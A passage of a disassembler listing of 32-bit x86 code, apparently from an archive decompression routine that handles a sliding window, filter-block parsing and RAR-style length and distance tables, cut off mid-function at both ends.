and dword ptr [edi], 0
pop ecx
loc_9B0DD9: ; CODE XREF: sub_9B0DBC+10�j
and dword ptr [esi+40D7B8h], 0
and dword ptr [esi+40D7B4h], 0
lea eax, [esi+40D7A0h]
push eax
call sub_9B2510
add esi, 40D7A8h
push esi
call sub_9B2510
pop ecx
pop ecx
pop edi
pop esi
retn
sub_9B0DBC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9B0E04(char,void *Src)
sub_9B0E04 proc near ; CODE XREF: sub_9B128A+BD�p
; sub_9B1364+BE�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = byte ptr 8
Src = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 20h
push ebx
xor ebx, ebx
test [ebp+arg_0], 80h
push esi
mov [ebp+var_20], eax
mov eax, [ebp+Src]
push edi
mov edi, ecx
mov [ebp+var_1C], eax
mov [ebp+var_18], ebx
mov [ebp+var_14], ebx
jz short loc_9B0E48
lea eax, [ebp+var_20]
push eax
call sub_9B3AA1
mov esi, eax
cmp esi, ebx
pop ecx
mov [ebp+var_4], esi
jnz short loc_9B0E42
push edi
call sub_9B0DBC
pop ecx
jmp short loc_9B0E53
; ---------------------------------------------------------------------------
loc_9B0E42: ; CODE XREF: sub_9B0E04+33�j
dec esi
mov [ebp+var_4], esi
jmp short loc_9B0E53
; ---------------------------------------------------------------------------
loc_9B0E48: ; CODE XREF: sub_9B0E04+20�j
mov eax, [edi+40D7B4h]
mov [ebp+var_4], eax
mov esi, eax
loc_9B0E53: ; CODE XREF: sub_9B0E04+3C�j
; sub_9B0E04+42�j
mov eax, [edi+40D7A4h]
cmp esi, eax
ja loc_9B1126
cmp esi, [edi+40D7B8h]
ja loc_9B1126
xor ecx, ecx
cmp esi, eax
setz cl
mov [edi+40D7B4h], esi
cmp ecx, ebx
mov [ebp+var_10], ecx
jz short loc_9B0EFE
lea esi, [edi+40D7A0h]
push 1
push esi
call sub_9B2463
test eax, eax
pop ecx
pop ecx
jz loc_9B1126
call sub_9B2497
mov ecx, [esi]
mov ebx, eax
mov eax, [edi+40D7A4h]
mov [ecx+eax*4-4], ebx
mov eax, [edi+40D7A4h]
mov ecx, [esi]
cmp dword ptr [ecx+eax*4-4], 0
mov [ebp+var_8], ebx
jz loc_9B1126
inc dword ptr [edi+40D7B8h]
mov eax, [edi+40D7B8h]
shl eax, 2
push eax ; NewSize
lea esi, [edi+40D7B0h]
push dword ptr [esi] ; Memory
call sub_9B2565
test eax, eax
pop ecx
pop ecx
mov [esi], eax
jz loc_9B1126
mov ecx, [edi+40D7B8h]
and dword ptr [eax+ecx*4-4], 0
and dword ptr [ebx+8], 0
xor ebx, ebx
jmp short loc_9B0F0D
; ---------------------------------------------------------------------------
loc_9B0EFE: ; CODE XREF: sub_9B0E04+7B�j
mov eax, [edi+40D7A0h]
mov esi, [eax+esi*4]
inc dword ptr [esi+8]
mov [ebp+var_8], esi
loc_9B0F0D: ; CODE XREF: sub_9B0E04+F8�j
call sub_9B2497
mov esi, eax
xor eax, eax
cmp [edi+40D7ACh], ebx
mov [ebp+var_C], ebx
mov [ebp+Src], eax
jbe short loc_9B0F63
lea ebx, [edi+40D7A8h]
loc_9B0F2A: ; CODE XREF: sub_9B0E04+159�j
mov ecx, [ebx]
mov ecx, [ecx+eax*4]
mov edx, eax
sub edx, [ebp+var_C]
mov eax, [ebx]
mov [eax+edx*4], ecx
mov ecx, [ebx]
mov eax, [ebp+Src]
lea ecx, [ecx+eax*4]
cmp dword ptr [ecx], 0
jnz short loc_9B0F49
inc [ebp+var_C]
loc_9B0F49: ; CODE XREF: sub_9B0E04+140�j
mov edx, [ebp+var_C]
test edx, edx
jle short loc_9B0F53
and dword ptr [ecx], 0
loc_9B0F53: ; CODE XREF: sub_9B0E04+14A�j
inc eax
cmp eax, [edi+40D7ACh]
mov [ebp+Src], eax
jb short loc_9B0F2A
test edx, edx
jnz short loc_9B0F76
loc_9B0F63: ; CODE XREF: sub_9B0E04+11E�j
lea ebx, [edi+40D7A8h]
push 1
push ebx
call sub_9B2463
pop ecx
xor edx, edx
pop ecx
inc edx
loc_9B0F76: ; CODE XREF: sub_9B0E04+15D�j
mov eax, [edi+40D7ACh]
mov ecx, [ebx]
mov ebx, [ebp+var_8]
sub eax, edx
mov [ecx+eax*4], esi
mov eax, [ebx+8]
mov [esi+8], eax
lea eax, [ebp+var_20]
push eax
call sub_9B3AA1
test [ebp+arg_0], 40h
pop ecx
mov [ebp+Src], eax
jz short loc_9B0FA6
add [ebp+Src], 102h
loc_9B0FA6: ; CODE XREF: sub_9B0E04+199�j
mov eax, [edi+40800Ch]
add eax, [ebp+Src]
and eax, 3FFFFFh
test [ebp+arg_0], 20h
mov [esi], eax
jz short loc_9B0FCB
lea eax, [ebp+var_20]
push eax
call sub_9B3AA1
pop ecx
mov ecx, [ebp+var_4]
jmp short loc_9B0FE3
; ---------------------------------------------------------------------------
loc_9B0FCB: ; CODE XREF: sub_9B0E04+1B6�j
mov ecx, [ebp+var_4]
cmp ecx, [edi+40D7B8h]
jnb short loc_9B0FE1
mov eax, [edi+40D7B0h]
mov eax, [eax+ecx*4]
jmp short loc_9B0FE3
; ---------------------------------------------------------------------------
loc_9B0FE1: ; CODE XREF: sub_9B0E04+1D0�j
xor eax, eax
loc_9B0FE3: ; CODE XREF: sub_9B0E04+1C5�j
; sub_9B0E04+1DB�j
mov [esi+4], eax
mov eax, [edi+408010h]
mov edx, [edi+40800Ch]
cmp eax, edx
jz short loc_9B1007
sub eax, edx
and eax, 3FFFFFh
cmp eax, [ebp+Src]
ja short loc_9B1007
xor eax, eax
inc eax
jmp short loc_9B1009
; ---------------------------------------------------------------------------
loc_9B1007: ; CODE XREF: sub_9B0E04+1F0�j
; sub_9B0E04+1FC�j
xor eax, eax
loc_9B1009: ; CODE XREF: sub_9B0E04+201�j
mov edx, [esi+4]
mov [esi+0Ch], eax
mov eax, [edi+40D7B0h]
push 1Ch ; Size
mov [eax+ecx*4], edx
lea eax, [esi+34h]
push 0 ; Val
push eax ; Dst
call memset
mov eax, [esi+4]
mov [esi+44h], eax
mov eax, [esi+8]
add esp, 0Ch
test [ebp+arg_0], 10h
mov dword ptr [esi+40h], 3C000h
mov [esi+48h], eax
jz short loc_9B1092
lea eax, [ebp+var_20]
push eax
call sub_9B3A73
mov ebx, eax
lea eax, [ebp+var_20]
push 7
push eax
shr ebx, 9
call sub_9B3A59
lea eax, [esi+34h]
add esp, 0Ch
and [ebp+Src], 0
mov [ebp+var_C], eax
loc_9B1067: ; CODE XREF: sub_9B0E04+289�j
mov ecx, [ebp+Src]
xor eax, eax
inc eax
shl eax, cl
test eax, ebx
jz short loc_9B1082
lea eax, [ebp+var_20]
push eax
call sub_9B3AA1
pop ecx
mov ecx, [ebp+var_C]
mov [ecx], eax
loc_9B1082: ; CODE XREF: sub_9B0E04+26D�j
inc [ebp+Src]
add [ebp+var_C], 4
cmp [ebp+Src], 7
jl short loc_9B1067
mov ebx, [ebp+var_8]
loc_9B1092: ; CODE XREF: sub_9B0E04+23B�j
cmp [ebp+var_10], 0
jz loc_9B1137
lea eax, [ebp+var_20]
push eax
call sub_9B3AA1
cmp eax, 1000h
pop ecx
mov [ebp+var_C], eax
jge short loc_9B1126
test eax, eax
jz short loc_9B1126
cmp eax, [ebp+var_1C]
jg short loc_9B1126
test eax, eax
jl short loc_9B1126
push eax ; Size
call sub_9B254A
test eax, eax
pop ecx
mov [ebp+Src], eax
jz short loc_9B1126
xor ebx, ebx
cmp [ebp+var_C], ebx
jle short loc_9B10F8
loc_9B10D2: ; CODE XREF: sub_9B0E04+2F2�j
lea eax, [ebp+var_20]
push eax
call sub_9B3A73
mov ecx, [ebp+Src]
shr eax, 8
mov [ecx+ebx], al
lea eax, [ebp+var_20]
push 8
push eax
call sub_9B3A59
add esp, 0Ch
inc ebx
cmp ebx, [ebp+var_C]
jl short loc_9B10D2
loc_9B10F8: ; CODE XREF: sub_9B0E04+2CC�j
mov eax, [ebp+var_8]
add eax, 10h
push eax ; int
push [ebp+var_C] ; int
lea eax, [ebp+var_20]
push [ebp+Src] ; Src
add edi, 40D7CCh
push eax ; int
push edi ; int
call sub_9B4C4B
add esp, 14h
test eax, eax
push [ebp+Src] ; Memory
jnz short loc_9B112D
call free
pop ecx
loc_9B1126: ; CODE XREF: sub_9B0E04+57�j
; sub_9B0E04+63�j ...
xor eax, eax
loc_9B1128: ; CODE XREF: sub_9B0E04+481�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_9B112D: ; CODE XREF: sub_9B0E04+319�j
call free
mov ebx, [ebp+var_8]
pop ecx
loc_9B1137: ; CODE XREF: sub_9B0E04+292�j
mov eax, [ebx+10h]
mov [esi+18h], eax
mov eax, [ebx+30h]
mov [esi+30h], eax
mov edi, [ebx+2Ch]
test edi, edi
jle short loc_9B116D
cmp edi, 2000h
jge short loc_9B116D
push edi ; Size
call sub_9B254A
test eax, eax
pop ecx
mov [esi+20h], eax
jz short loc_9B1126
push edi ; Size
push dword ptr [ebx+20h] ; Src
push eax ; Dst
call memcpy
add esp, 0Ch
loc_9B116D: ; CODE XREF: sub_9B0E04+344�j
; sub_9B0E04+34C�j
push 40h
pop edi
cmp [esi+28h], edi
jge short loc_9B119C
push dword ptr [esi+1Ch] ; Memory
call free
push edi ; Size
call sub_9B254A
test eax, eax
pop ecx
pop ecx
mov [esi+1Ch], eax
jz short loc_9B1126
push edi ; Size
push 0 ; Val
push eax ; Dst
call memset
add esp, 0Ch
mov [esi+28h], edi
loc_9B119C: ; CODE XREF: sub_9B0E04+36F�j
mov edi, [esi+1Ch]
mov [ebp+Src], edi
lea ebx, [esi+34h]
mov [ebp+var_10], 7
loc_9B11AC: ; CODE XREF: sub_9B0E04+3C1�j
push dword ptr [ebx]
push [ebp+Src]
push 0
call sub_9B39C6
add [ebp+Src], 4
add esp, 0Ch
add ebx, 4
dec [ebp+var_10]
jnz short loc_9B11AC
push dword ptr [esi+4]
lea eax, [edi+1Ch]
push eax
xor ebx, ebx
push ebx
call sub_9B39C6
push ebx
lea eax, [edi+20h]
push eax
push ebx
call sub_9B39C6
push dword ptr [esi+8]
lea eax, [edi+2Ch]
push eax
push ebx
call sub_9B39C6
push 10h ; Size
push ebx ; Val
add edi, 30h
push edi ; Dst
call memset
add esp, 30h
test [ebp+arg_0], 8
jz short loc_9B1282
lea eax, [ebp+var_20]
push eax
call sub_9B3AA1
mov edi, eax
cmp edi, 10000h
pop ecx
jge loc_9B1126
mov eax, [esi+28h]
lea ecx, [edi+40h]
cmp eax, ecx
jnb short loc_9B1247
mov ecx, edi
sub ecx, eax
add ecx, 40h
add [esi+28h], ecx
push dword ptr [esi+28h] ; NewSize
push dword ptr [esi+1Ch] ; Memory
call sub_9B2565
cmp eax, ebx
pop ecx
pop ecx
mov [esi+1Ch], eax
jz loc_9B1126
loc_9B1247: ; CODE XREF: sub_9B0E04+41F�j
mov esi, [esi+1Ch]
add esi, 40h
cmp edi, ebx
jle short loc_9B1282
loc_9B1251: ; CODE XREF: sub_9B0E04+47C�j
mov eax, [ebp+var_18]
add eax, 2
cmp eax, [ebp+var_1C]
jg loc_9B1126
lea eax, [ebp+var_20]
push eax
call sub_9B3A73
shr eax, 8
mov [esi+ebx], al
lea eax, [ebp+var_20]
push 8
push eax
call sub_9B3A59
add esp, 0Ch
inc ebx
cmp ebx, edi
jl short loc_9B1251
loc_9B1282: ; CODE XREF: sub_9B0E04+3FD�j
; sub_9B0E04+44B�j
xor eax, eax
inc eax
jmp loc_9B1128
sub_9B0E04 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B128A proc near ; CODE XREF: sub_9B1547+74D�p
Memory = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
call sub_9B04B6
mov ebx, eax
push 8
push edi
shr ebx, 8
call sub_9B0493
mov esi, ebx
and esi, 7
add esp, 0Ch
inc esi
cmp esi, 7
jnz short loc_9B12C4
push edi
call sub_9B04B6
mov esi, eax
shr esi, 8
add esi, 7
push 8
jmp short loc_9B12D3
; ---------------------------------------------------------------------------
loc_9B12C4: ; CODE XREF: sub_9B128A+26�j
cmp esi, 8
jnz short loc_9B12DC
push edi
call sub_9B04B6
mov esi, eax
push 10h
loc_9B12D3: ; CODE XREF: sub_9B128A+38�j
push edi
call sub_9B0493
add esp, 0Ch
loc_9B12DC: ; CODE XREF: sub_9B128A+3D�j
lea eax, [esi+2]
push eax ; Size
call sub_9B254A
test eax, eax
pop ecx
mov [ebp+Memory], eax
jz short loc_9B1360
and [ebp+var_4], 0
test esi, esi
jle short loc_9B1340
loc_9B12F5: ; CODE XREF: sub_9B128A+B4�j
mov eax, [edi+408018h]
dec eax
cmp [edi+408004h], eax
jl short loc_9B131B
push edi
push [ebp+arg_0]
call sub_9B04E9
test eax, eax
pop ecx
pop ecx
jnz short loc_9B131B
lea eax, [esi-1]
cmp [ebp+var_4], eax
jl short loc_9B1360
loc_9B131B: ; CODE XREF: sub_9B128A+78�j
; sub_9B128A+87�j
push edi
call sub_9B04B6
mov ecx, [ebp+var_4]
mov edx, [ebp+Memory]
shr eax, 8
push 8
push edi
mov [ecx+edx], al
call sub_9B0493
add esp, 0Ch
inc [ebp+var_4]
cmp [ebp+var_4], esi
jl short loc_9B12F5
loc_9B1340: ; CODE XREF: sub_9B128A+69�j
mov eax, [ebp+Memory]
push esi ; Src
push ebx ; char
mov ecx, edi
call sub_9B0E04
push [ebp+Memory] ; Memory
mov esi, eax
call free
add esp, 0Ch
mov eax, esi
loc_9B135C: ; CODE XREF: sub_9B128A+D8�j
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_9B1360: ; CODE XREF: sub_9B128A+61�j
; sub_9B128A+8F�j
xor eax, eax
jmp short loc_9B135C
sub_9B128A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B1364 proc near ; CODE XREF: sub_9B1547+525�p
var_C = byte ptr -0Ch
Memory = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
push edi
push [ebp+arg_0]
lea ebx, [edi+408B10h]
push ebx
call sub_9B37F8
mov esi, eax
add esp, 0Ch
cmp esi, 0FFFFFFFFh
mov dword ptr [ebp+var_C], esi
jz short loc_9B13EA
and esi, 7
inc esi
cmp esi, 7
jnz short loc_9B13A9
push edi
push [ebp+arg_0]
push ebx
call sub_9B37F8
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz short loc_9B13EA
lea esi, [eax+7]
jmp short loc_9B13D9
; ---------------------------------------------------------------------------
loc_9B13A9: ; CODE XREF: sub_9B1364+2C�j
cmp esi, 8
jnz short loc_9B13D9
push edi
push [ebp+arg_0]
push ebx
call sub_9B37F8
mov esi, eax
add esp, 0Ch
cmp esi, 0FFFFFFFFh
jz short loc_9B13EA
push edi
push [ebp+arg_0]
push ebx
call sub_9B37F8
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz short loc_9B13EA
shl esi, 8
add esi, eax
loc_9B13D9: ; CODE XREF: sub_9B1364+43�j
; sub_9B1364+48�j
lea eax, [esi+2]
push eax ; Size
call sub_9B254A
test eax, eax
pop ecx
mov [ebp+Memory], eax
jnz short loc_9B13EE
loc_9B13EA: ; CODE XREF: sub_9B1364+23�j
; sub_9B1364+3E�j ...
xor eax, eax
jmp short loc_9B1437
; ---------------------------------------------------------------------------
loc_9B13EE: ; CODE XREF: sub_9B1364+84�j
and [ebp+var_4], 0
test esi, esi
jle short loc_9B1419
loc_9B13F6: ; CODE XREF: sub_9B1364+B3�j
push edi
push [ebp+arg_0]
push ebx
call sub_9B37F8
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz short loc_9B143B
mov edx, [ebp+var_4]
inc [ebp+var_4]
cmp [ebp+var_4], esi
mov ecx, [ebp+Memory]
mov [edx+ecx], al
jl short loc_9B13F6
loc_9B1419: ; CODE XREF: sub_9B1364+90�j
mov eax, [ebp+Memory]
push esi ; Src
push dword ptr [ebp+var_C] ; char
mov ecx, edi
call sub_9B0E04
pop ecx
pop ecx
mov esi, eax
loc_9B142B: ; CODE XREF: sub_9B1364+D9�j
push [ebp+Memory] ; Memory
call free
pop ecx
mov eax, esi
loc_9B1437: ; CODE XREF: sub_9B1364+88�j
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_9B143B: ; CODE XREF: sub_9B1364+A2�j
xor esi, esi
jmp short loc_9B142B
sub_9B1364 endp
; =============== S U B R O U T I N E =======================================
sub_9B143F proc near ; CODE XREF: sub_9B1547+429�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_4]
push edi
xor edi, edi
cmp [esp+8+arg_0], edi
jnz loc_9B150C
push 10h ; Size
lea eax, [esi+408AF4h]
push edi ; Val
push eax ; Dst
mov [esi+408014h], edi
call memset
push 194h ; Size
lea eax, [esi+40802Ch]
push edi ; Val
push eax ; Dst
mov [esi+408B04h], edi
call memset
push 530h ; Size
lea eax, [esi+4081C0h]
push edi ; Val
push eax ; Dst
call memset
push 174h ; Size
lea eax, [esi+4086F0h]
push edi ; Val
push eax ; Dst
call memset
push 0C8h ; Size
lea eax, [esi+408864h]
push edi ; Val
push eax ; Dst
call memset
push 0F4h ; Size
lea eax, [esi+40892Ch]
push edi ; Val
push eax ; Dst
call memset
add esp, 48h
push 0D4h ; Size
lea eax, [esi+408A20h]
push edi ; Val
push eax ; Dst
call memset
push esi
mov [esi+408B08h], edi
mov [esi+408B0Ch], edi
mov dword ptr [esi+40D79Ch], 2
mov [esi+40800Ch], edi
mov [esi+408010h], edi
mov [esi+408020h], edi
call sub_9B0DBC
add esp, 10h
loc_9B150C: ; CODE XREF: sub_9B143F+C�j
lea eax, [esi+40D7CCh]
push eax
mov [esi+408008h], edi
mov [esi+408004h], edi
mov [esi+408018h], edi
mov [esi+40801Ch], edi
mov [esi+40D7BCh], edi
mov [esi+40D7C0h], edi
call sub_9B3A22
or dword ptr [esi+40D7F4h], 0FFFFFFFFh
pop ecx
pop edi
pop esi
retn
sub_9B143F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=70h
sub_9B1547 proc near ; CODE XREF: sub_9B1DD3+15�p
var_188 = dword ptr -188h
var_184 = dword ptr -184h
var_180 = dword ptr -180h
var_17C = dword ptr -17Ch
var_178 = dword ptr -178h
var_174 = dword ptr -174h
var_170 = dword ptr -170h
var_16C = dword ptr -16Ch
var_168 = dword ptr -168h
var_164 = dword ptr -164h
var_160 = dword ptr -160h
var_15C = dword ptr -15Ch
var_158 = dword ptr -158h
var_154 = dword ptr -154h
var_150 = dword ptr -150h
var_14C = dword ptr -14Ch
var_148 = dword ptr -148h
var_144 = dword ptr -144h
var_140 = dword ptr -140h
var_13C = dword ptr -13Ch
var_138 = dword ptr -138h
var_134 = dword ptr -134h
var_130 = dword ptr -130h
var_12C = dword ptr -12Ch
var_128 = dword ptr -128h
var_124 = dword ptr -124h
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_118 = dword ptr -118h
var_114 = dword ptr -114h
var_110 = dword ptr -110h
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_104 = dword ptr -104h
var_100 = dword ptr -100h
var_FC = dword ptr -0FCh
var_F8 = dword ptr -0F8h
var_F4 = dword ptr -0F4h
var_F0 = dword ptr -0F0h
var_EC = dword ptr -0ECh
var_E8 = dword ptr -0E8h
var_E4 = dword ptr -0E4h
var_E0 = dword ptr -0E0h
var_DC = dword ptr -0DCh
var_D8 = dword ptr -0D8h
var_D4 = dword ptr -0D4h
var_D0 = dword ptr -0D0h
var_CC = dword ptr -0CCh
var_C8 = dword ptr -0C8h
var_C4 = dword ptr -0C4h
var_C0 = dword ptr -0C0h
var_BC = dword ptr -0BCh
var_B8 = dword ptr -0B8h
var_B4 = dword ptr -0B4h
var_B0 = dword ptr -0B0h
var_AC = dword ptr -0ACh
var_A8 = dword ptr -0A8h
var_A4 = dword ptr -0A4h
var_A0 = dword ptr -0A0h
var_9C = dword ptr -9Ch
var_98 = dword ptr -98h
var_94 = byte ptr -94h
var_93 = byte ptr -93h
var_92 = byte ptr -92h
var_91 = byte ptr -91h
var_90 = byte ptr -90h
var_8F = byte ptr -8Fh
var_8E = byte ptr -8Eh
var_8D = byte ptr -8Dh
var_8C = byte ptr -8Ch
var_8B = byte ptr -8Bh
var_8A = byte ptr -8Ah
var_89 = byte ptr -89h
var_88 = byte ptr -88h
var_87 = byte ptr -87h
var_86 = byte ptr -86h
var_85 = byte ptr -85h
var_84 = byte ptr -84h
var_83 = byte ptr -83h
var_82 = byte ptr -82h
var_81 = byte ptr -81h
var_80 = byte ptr -80h
var_7F = byte ptr -7Fh
var_7E = byte ptr -7Eh
var_7D = byte ptr -7Dh
var_7C = byte ptr -7Ch
var_7B = byte ptr -7Bh
var_7A = byte ptr -7Ah
var_79 = byte ptr -79h
var_78 = byte ptr -78h
var_77 = byte ptr -77h
var_76 = byte ptr -76h
var_75 = byte ptr -75h
var_74 = byte ptr -74h
var_73 = byte ptr -73h
var_72 = byte ptr -72h
var_71 = byte ptr -71h
var_70 = byte ptr -70h
var_6F = byte ptr -6Fh
var_6E = byte ptr -6Eh
var_6D = byte ptr -6Dh
var_6C = byte ptr -6Ch
var_6B = byte ptr -6Bh
var_6A = byte ptr -6Ah
var_69 = byte ptr -69h
var_68 = byte ptr -68h
var_67 = byte ptr -67h
var_66 = byte ptr -66h
var_65 = byte ptr -65h
var_64 = byte ptr -64h
var_63 = byte ptr -63h
var_62 = byte ptr -62h
var_61 = byte ptr -61h
var_60 = byte ptr -60h
var_5F = byte ptr -5Fh
var_5E = byte ptr -5Eh
var_5D = byte ptr -5Dh
var_5C = byte ptr -5Ch
var_5B = byte ptr -5Bh
var_5A = byte ptr -5Ah
var_59 = byte ptr -59h
var_58 = byte ptr -58h
var_57 = byte ptr -57h
var_56 = byte ptr -56h
var_55 = byte ptr -55h
var_54 = byte ptr -54h
var_53 = byte ptr -53h
var_52 = byte ptr -52h
var_51 = byte ptr -51h
var_50 = byte ptr -50h
var_4F = byte ptr -4Fh
var_4E = byte ptr -4Eh
var_4D = byte ptr -4Dh
var_4C = byte ptr -4Ch
var_4B = byte ptr -4Bh
var_4A = byte ptr -4Ah
var_49 = byte ptr -49h
var_48 = byte ptr -48h
var_47 = byte ptr -47h
var_46 = byte ptr -46h
var_45 = byte ptr -45h
var_44 = byte ptr -44h
var_43 = byte ptr -43h
var_42 = byte ptr -42h
var_41 = byte ptr -41h
var_40 = byte ptr -40h
var_3F = byte ptr -3Fh
var_3E = byte ptr -3Eh
var_3D = byte ptr -3Dh
var_3C = byte ptr -3Ch
var_3B = byte ptr -3Bh
var_3A = byte ptr -3Ah
var_39 = byte ptr -39h
var_38 = byte ptr -38h
var_37 = byte ptr -37h
var_36 = byte ptr -36h
var_35 = byte ptr -35h
var_34 = byte ptr -34h
var_33 = byte ptr -33h
var_32 = byte ptr -32h
var_31 = byte ptr -31h
var_30 = byte ptr -30h
var_2F = byte ptr -2Fh
var_2E = byte ptr -2Eh
var_2D = byte ptr -2Dh
var_2C = byte ptr -2Ch
var_2B = byte ptr -2Bh
var_2A = byte ptr -2Ah
var_29 = byte ptr -29h
var_28 = byte ptr -28h
var_27 = byte ptr -27h
var_26 = byte ptr -26h
var_25 = byte ptr -25h
var_24 = byte ptr -24h
var_23 = byte ptr -23h
var_22 = byte ptr -22h
var_21 = byte ptr -21h
var_20 = byte ptr -20h
var_1F = byte ptr -1Fh
var_1E = byte ptr -1Eh
var_1D = byte ptr -1Dh
var_1C = byte ptr -1Ch
var_1B = byte ptr -1Bh
var_1A = byte ptr -1Ah
var_19 = byte ptr -19h
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
lea ebp, [esp-70h]
sub esp, 188h
push ebx
xor ebx, ebx
push edi
mov edi, eax
xor eax, eax
inc eax
mov [ebp+70h+var_3C], bl
mov [ebp+70h+var_3B], 1
mov [ebp+70h+var_3A], 2
mov [ebp+70h+var_39], 3
mov [ebp+70h+var_38], 4
mov [ebp+70h+var_37], 5
mov [ebp+70h+var_36], 6
mov [ebp+70h+var_35], 7
mov [ebp+70h+var_34], 8
mov [ebp+70h+var_33], 0Ah
mov [ebp+70h+var_32], 0Ch
mov [ebp+70h+var_31], 0Eh
mov [ebp+70h+var_30], 10h
mov [ebp+70h+var_2F], 14h
mov [ebp+70h+var_2E], 18h
mov [ebp+70h+var_2D], 1Ch
mov [ebp+70h+var_2C], 20h
mov [ebp+70h+var_2B], 28h
mov [ebp+70h+var_2A], 30h
mov [ebp+70h+var_29], 38h
mov [ebp+70h+var_28], 40h
mov [ebp+70h+var_27], 50h
mov [ebp+70h+var_26], 60h
mov [ebp+70h+var_25], 70h
mov [ebp+70h+var_24], 80h
mov [ebp+70h+var_23], 0A0h
mov [ebp+70h+var_22], 0C0h
mov [ebp+70h+var_21], 0E0h
mov [ebp+70h+var_58], bl
mov [ebp+70h+var_57], bl
mov [ebp+70h+var_56], bl
mov [ebp+70h+var_55], bl
mov [ebp+70h+var_54], bl
mov [ebp+70h+var_53], bl
mov [ebp+70h+var_52], bl
mov [ebp+70h+var_51], bl
mov [ebp+70h+var_50], 1
mov [ebp+70h+var_4F], 1
mov [ebp+70h+var_4E], 1
mov [ebp+70h+var_4D], 1
mov [ebp+70h+var_4C], 2
mov [ebp+70h+var_4B], 2
mov [ebp+70h+var_4A], 2
mov [ebp+70h+var_49], 2
mov [ebp+70h+var_48], 3
mov [ebp+70h+var_47], 3
mov [ebp+70h+var_46], 3
mov [ebp+70h+var_45], 3
mov [ebp+70h+var_44], 4
mov [ebp+70h+var_43], 4
mov [ebp+70h+var_42], 4
mov [ebp+70h+var_41], 4
mov [ebp+70h+var_40], 5
mov [ebp+70h+var_3F], 5
mov [ebp+70h+var_3E], 5
mov [ebp+70h+var_3D], 5
mov [ebp+70h+var_188], ebx
mov [ebp+70h+var_184], eax
mov [ebp+70h+var_180], 2
mov [ebp+70h+var_17C], 3
mov [ebp+70h+var_178], 4
mov [ebp+70h+var_174], 6
mov [ebp+70h+var_170], 8
mov [ebp+70h+var_16C], 0Ch
mov [ebp+70h+var_168], 10h
mov [ebp+70h+var_164], 18h
mov [ebp+70h+var_160], 20h
mov [ebp+70h+var_15C], 30h
mov [ebp+70h+var_158], 40h
mov [ebp+70h+var_154], 60h
mov [ebp+70h+var_150], 80h
mov [ebp+70h+var_14C], 0C0h
mov [ebp+70h+var_148], 100h
mov [ebp+70h+var_144], 180h
mov [ebp+70h+var_140], 200h
mov [ebp+70h+var_13C], 300h
mov [ebp+70h+var_138], 400h
mov [ebp+70h+var_134], 600h
mov [ebp+70h+var_130], 800h
mov [ebp+70h+var_12C], 0C00h
mov [ebp+70h+var_128], 1000h
mov [ebp+70h+var_124], 1800h
mov [ebp+70h+var_120], 2000h
mov [ebp+70h+var_11C], 3000h
mov [ebp+70h+var_118], 4000h
mov [ebp+70h+var_114], 6000h
mov [ebp+70h+var_110], 8000h
mov [ebp+70h+var_10C], 0C000h
mov [ebp+70h+var_108], 10000h
mov [ebp+70h+var_104], 18000h
mov [ebp+70h+var_100], 20000h
mov [ebp+70h+var_FC], 30000h
mov [ebp+70h+var_F8], 40000h
mov [ebp+70h+var_F4], 50000h
mov [ebp+70h+var_F0], 60000h
mov [ebp+70h+var_EC], 70000h
mov [ebp+70h+var_E8], 80000h
mov [ebp+70h+var_E4], 90000h
mov [ebp+70h+var_E0], 0A0000h
mov [ebp+70h+var_DC], 0B0000h
mov [ebp+70h+var_D8], 0C0000h
mov [ebp+70h+var_D4], 0D0000h
mov [ebp+70h+var_D0], 0E0000h
mov [ebp+70h+var_CC], 0F0000h
mov [ebp+70h+var_C8], 100000h
mov [ebp+70h+var_C4], 140000h
mov [ebp+70h+var_C0], 180000h
mov [ebp+70h+var_BC], 1C0000h
mov [ebp+70h+var_B8], 200000h
mov [ebp+70h+var_B4], 240000h
mov [ebp+70h+var_B0], 280000h
mov [ebp+70h+var_AC], 2C0000h
mov [ebp+70h+var_A8], 300000h
mov [ebp+70h+var_A4], 340000h
mov [ebp+70h+var_A0], 380000h
mov [ebp+70h+var_9C], 3C0000h
mov [ebp+70h+var_94], bl
mov [ebp+70h+var_93], bl
mov [ebp+70h+var_92], bl
mov [ebp+70h+var_91], bl
mov [ebp+70h+var_90], al
mov [ebp+70h+var_8F], al
mov [ebp+70h+var_8E], 2
mov [ebp+70h+var_8D], 2
mov [ebp+70h+var_8C], 3
mov [ebp+70h+var_8B], 3
mov [ebp+70h+var_8A], 4
mov [ebp+70h+var_89], 4
mov [ebp+70h+var_88], 5
mov [ebp+70h+var_87], 5
mov [ebp+70h+var_86], 6
mov [ebp+70h+var_85], 6
mov [ebp+70h+var_84], 7
mov [ebp+70h+var_83], 7
mov [ebp+70h+var_82], 8
mov [ebp+70h+var_81], 8
mov [ebp+70h+var_80], 9
mov [ebp+70h+var_7F], 9
mov [ebp+70h+var_7E], 0Ah
